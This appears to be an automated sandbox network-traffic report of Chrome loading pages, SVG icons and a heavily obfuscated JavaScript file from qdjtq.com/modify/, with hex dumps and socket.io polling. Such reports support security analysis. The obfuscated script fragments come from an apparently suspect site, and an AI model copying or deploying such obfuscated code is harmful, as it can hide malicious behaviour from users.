            2024-09-27 00:29:45 UTC1257INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 31 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 20 31 31 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 63 6f 6e 2f 6d 6f 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 66 69 6c 74 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Icon/more</title> <defs> <filter color-interpolati


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            41192.168.2.649764129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC597OUTGET /modify/layout/images/53.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: image/svg+xml
            Content-Length: 14355
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"3813-1902494f420"
            2024-09-27 00:29:45 UTC14355INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 38 32 70 78 22 20 68 65 69 67 68 74 3d 22 33 31 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 38 32 20 33 31 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 34 38 34 32 38 38 38 37 22 20 79 31 3d 22 31 2e 30 31 34 38 38 38 33 22 20 78 32 3d 22 30 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="182px" height="31px" viewBox="0 0 182 31" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.48428887" y1="1.0148883" x2="0.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            42192.168.2.649765129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC597OUTGET /modify/layout/images/62.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: image/svg+xml
            Content-Length: 8357
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"20a5-1902494f420"
            2024-09-27 00:29:45 UTC8357INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 30 2e 31 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22
            Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            43192.168.2.649766129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC363OUTGET /modify/assets/63d4f0c9ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 115770
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1c43a-19024951b30"
            2024-09-27 00:29:45 UTC16020INData Raw: 76 61 72 20 61 31 38 5f 30 78 32 38 35 32 38 32 3d 61 31 38 5f 30 78 39 36 36 36 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 62 33 38 63 36 2c 5f 30 78 35 65 31 65 34 38 29 7b 76 61 72 20 5f 30 78 33 39 38 36 62 30 3d 61 31 38 5f 30 78 39 36 36 36 2c 5f 30 78 35 34 38 31 36 34 3d 5f 30 78 31 62 33 38 63 36 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 64 39 61 36 62 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 36 31 65 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 32 66 31 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 35 66 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 33 63 63
            Data Ascii: var a18_0x285282=a18_0x9666;(function(_0x1b38c6,_0x5e1e48){var _0x3986b0=a18_0x9666,_0x548164=_0x1b38c6();while(!![]){try{var _0x1d9a6b=-parseInt(_0x3986b0(0x61e))/0x1+parseInt(_0x3986b0(0x2f1))/0x2+parseInt(_0x3986b0(0x5f7))/0x3*(parseInt(_0x3986b0(0x3cc
            2024-09-27 00:29:45 UTC16384INData Raw: 4a 63 79 3b 27 3a 27 d0 82 27 2c 27 26 44 53 63 79 3b 27 3a 27 d0 85 27 2c 27 26 44 5a 63 79 3b 27 3a 27 d0 8f 27 2c 27 26 44 61 67 67 65 72 3b 27 3a 27 e2 80 a1 27 2c 27 26 44 61 72 72 3b 27 3a 27 e2 86 a1 27 2c 27 26 44 61 73 68 76 3b 27 3a 27 e2 ab a4 27 2c 27 26 44 63 61 72 6f 6e 3b 27 3a 27 c4 8e 27 2c 27 26 44 63 79 3b 27 3a 27 d0 94 27 2c 27 26 44 65 6c 3b 27 3a 27 e2 88 87 27 2c 27 26 44 65 6c 74 61 3b 27 3a 27 ce 94 27 2c 27 26 44 66 72 3b 27 3a 27 f0 9d 94 87 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 41 63 75 74 65 3b 27 3a 27 c2 b4 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 74 3b 27 3a 27 cb 99 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 75 62 6c 65 41 63 75 74 65 3b 27 3a 27 cb 9d 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c
            Data Ascii: Jcy;':'','&DScy;':'','&DZcy;':'','&Dagger;':'','&Darr;':'','&Dashv;':'','&Dcaron;':'','&Dcy;':'','&Del;':'','&Delta;':'','&Dfr;':'','&DiacriticalAcute;':'','&DiacriticalDot;':'','&DiacriticalDoubleAcute;':'','&Diacritical
            2024-09-27 00:29:46 UTC16384INData Raw: 67 65 3b 27 3a 27 e2 8c 86 27 2c 27 26 64 6f 77 6e 61 72 72 6f 77 3b 27 3a 27 e2 86 93 27 2c 27 26 64 6f 77 6e 64 6f 77 6e 61 72 72 6f 77 73 3b 27 3a 27 e2 87 8a 27 2c 27 26 64 6f 77 6e 68 61 72 70 6f 6f 6e 6c 65 66 74 3b 27 3a 27 e2 87 83 27 2c 27 26 64 6f 77 6e 68 61 72 70 6f 6f 6e 72 69 67 68 74 3b 27 3a 27 e2 87 82 27 2c 27 26 64 72 62 6b 61 72 6f 77 3b 27 3a 27 e2 a4 90 27 2c 27 26 64 72 63 6f 72 6e 3b 27 3a 27 e2 8c 9f 27 2c 27 26 64 72 63 72 6f 70 3b 27 3a 27 e2 8c 8c 27 2c 27 26 64 73 63 72 3b 27 3a 27 f0 9d 92 b9 27 2c 27 26 64 73 63 79 3b 27 3a 27 d1 95 27 2c 27 26 64 73 6f 6c 3b 27 3a 27 e2 a7 b6 27 2c 27 26 64 73 74 72 6f 6b 3b 27 3a 27 c4 91 27 2c 27 26 64 74 64 6f 74 3b 27 3a 27 e2 8b b1 27 2c 27 26 64 74 72 69 3b 27 3a 27 e2 96 bf 27 2c 27
            Data Ascii: ge;':'','&downarrow;':'','&downdownarrows;':'','&downharpoonleft;':'','&downharpoonright;':'','&drbkarow;':'','&drcorn;':'','&drcrop;':'','&dscr;':'','&dscy;':'','&dsol;':'','&dstrok;':'','&dtdot;':'','&dtri;':'','
            2024-09-27 00:29:46 UTC16384INData Raw: 69 3b 27 3a 27 cf 95 27 2c 27 26 73 74 72 6e 73 3b 27 3a 27 c2 af 27 2c 27 26 73 75 62 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 45 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 64 6f 74 3b 27 3a 27 e2 aa bd 27 2c 27 26 73 75 62 65 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 65 64 6f 74 3b 27 3a 27 e2 ab 83 27 2c 27 26 73 75 62 6d 75 6c 74 3b 27 3a 27 e2 ab 81 27 2c 27 26 73 75 62 6e 45 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 6e 65 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 70 6c 75 73 3b 27 3a 27 e2 aa bf 27 2c 27 26 73 75 62 72 61 72 72 3b 27 3a 27 e2 a5 b9 27 2c 27 26 73 75 62 73 65 74 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 73 65 74 65 71 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 73 65 74 65 71 71 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 73 65 74 6e 65
            Data Ascii: i;':'','&strns;':'','&sub;':'','&subE;':'','&subdot;':'','&sube;':'','&subedot;':'','&submult;':'','&subnE;':'','&subne;':'','&subplus;':'','&subrarr;':'','&subset;':'','&subseteq;':'','&subseteqq;':'','&subsetne
            2024-09-27 00:29:46 UTC16384INData Raw: 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 33 37 29 2b 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 35 36 29 2c 27 e2 89 bf 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 30 64 29 2c 27 e2 88 91 27 3a 27 26 73 75 6d 3b 27 2c 27 e2 8b 91 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 64 63 29 2c 27 e2 8a 83 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 33 64 30 29 2c 27 e2 8a 87 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 31 65 32 29 2c 27 c3 9e 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 38 39 29 2c 27 e2 84 a2 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 39 35 29 2c 27 d0 8b 27 3a 27 26 54 53 48 63 79 3b 27 2c 27 d0 a6 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 33 63 37 29 2c 27 5c 78 30 39 27 3a
            Data Ascii: 18_0x285282(0x437)+a18_0x285282(0x556),'':a18_0x285282(0x40d),'':'&sum;','':a18_0x285282(0x4dc),'':a18_0x285282(0x3d0),'':a18_0x285282(0x1e2),'':a18_0x285282(0x289),'':a18_0x285282(0x495),'':'&TSHcy;','':a18_0x285282(0x3c7),'\x09':
            2024-09-27 00:29:46 UTC16384INData Raw: b8 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 33 37 29 2c 27 e2 8b b7 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 66 37 29 2c 27 e2 8b b6 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 30 32 29 2c 27 e2 8b be 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 62 35 29 2c 27 e2 8b bd 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 64 31 29 2c 27 e2 ab bd e2 83 a5 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 32 65 29 2c 27 e2 88 82 cc b8 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 31 64 37 29 2c 27 e2 a8 94 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 61 37 29 2c 27 e2 86 9b 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 38 35 29 2b 27 6f 77 3b 27 2c 27 e2 a4 b3 cc b8 27 3a 27 26 6e 72 61
            Data Ascii: ':a18_0x285282(0x537),'':a18_0x285282(0x2f7),'':a18_0x285282(0x602),'':a18_0x285282(0x5b5),'':a18_0x285282(0x6d1),'':a18_0x285282(0x62e),'':a18_0x285282(0x1d7),'':a18_0x285282(0x4a7),'':a18_0x285282(0x285)+'ow;','':'&nra
            2024-09-27 00:29:46 UTC16384INData Raw: 26 4e 6f 74 4e 65 73 74 65 64 27 2c 27 26 55 6d 61 63 72 3b 27 2c 27 26 64 64 3b 27 2c 27 26 72 65 61 6c 69 6e 65 3b 27 2c 27 26 65 70 61 72 73 6c 3b 27 2c 27 26 70 61 72 74 3b 27 2c 27 26 66 72 61 63 31 33 3b 27 2c 27 73 73 3b 27 2c 27 26 63 6f 6d 70 6c 65 78 65 73 27 2c 27 26 6e 69 76 3b 27 2c 27 26 6f 65 6c 69 67 3b 27 2c 27 26 65 61 63 75 74 65 3b 27 2c 27 26 6f 72 3b 27 2c 27 26 74 6f 70 66 6f 72 6b 3b 27 2c 27 26 4e 6f 42 72 65 61 6b 3b 27 2c 27 26 54 63 65 64 69 6c 3b 27 2c 27 26 6f 63 79 3b 27 2c 27 26 6c 72 63 6f 72 6e 65 72 3b 27 2c 27 63 61 6c 6c 27 2c 27 26 44 66 72 3b 27 2c 27 26 73 75 6e 67 3b 27 2c 27 26 63 75 70 64 6f 74 3b 27 2c 27 26 72 62 72 6b 65 3b 27 2c 27 26 62 75 6d 70 45 3b 27 2c 27 26 72 63 75 62 3b 27 2c 27 26 62 6f 78 56 48 3b
            Data Ascii: &NotNested','&Umacr;','&dd;','&realine;','&eparsl;','&part;','&frac13;','ss;','&complexes','&niv;','&oelig;','&eacute;','&or;','&topfork;','&NoBreak;','&Tcedil;','&ocy;','&lrcorner;','call','&Dfr;','&sung;','&cupdot;','&rbrke;','&bumpE;','&rcub;','&boxVH;
            2024-09-27 00:29:46 UTC1446INData Raw: 6f 66 20 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 27 73 74 61 74 75 73 27 5d 3d 3d 5f 30 78 31 31 33 31 32 64 28 30 78 35 31 35 29 26 26 28 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 31 63 31 29 5d 3d 5f 30 78 34 33 33 39 32 37 5b 27 6d 65 74 61 27 5d 5b 27 73 74 61 74 75 73 27 5d 29 2c 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 3d 5b 5d 2c 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 26 26 28 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 3d 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 5f 30
            Data Ascii: of _0x433927[_0x11312d(0x62a)]['status']==_0x11312d(0x515)&&(_0x1eab52[_0x11312d(0x1c1)]=_0x433927['meta']['status']),_0x1eab52[_0x11312d(0x469)]=[],_0x433927[_0x11312d(0x62a)][_0x11312d(0x469)]&&(_0x1eab52[_0x11312d(0x469)]=_0x433927[_0x11312d(0x62a)][_0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            44192.168.2.649767129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC597OUTGET /modify/layout/images/63.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:46 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: image/svg+xml
            Content-Length: 1956
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"7a4-1902494f420"
            2024-09-27 00:29:46 UTC1956INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 33 39 70 78 22 20 68 65 69 67 68 74 3d 22 33 39 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 39 20 33 39 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 2d 32 35 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 4c 33 39 20 30 4c 33 39 20 33 39 4c 30 20 33 39 4c 30 20 30 5a 22 20 69 64 3d 22 52 65 63 74
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="39px" height="39px" viewBox="0 0 39 39" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="Group-25"> <path d="M0 0L39 0L39 39L0 39L0 0Z" id="Rect


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            45192.168.2.649768129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC597OUTGET /modify/layout/images/64.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:46 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: image/svg+xml
            Content-Length: 2075
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"81b-1902494f420"
            2024-09-27 00:29:46 UTC2075INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 5f 31 22 3e 0d 0a 20 20 20 20 20 20 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 69 6e 3d 22 53 6f 75 72 63 65
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <filter id="filter_1"> <feColorMatrix in="Source


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            46192.168.2.649770129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:46 UTC166INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:46 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            47192.168.2.649769129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muYme&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:46 UTC214INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 1
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:46 UTC1INData Raw: 31
            Data Ascii: 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            48192.168.2.649771129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC597OUTGET /modify/layout/images/69.png HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:47 UTC310INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: image/png
            Content-Length: 6858
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1aca-1902494f420"
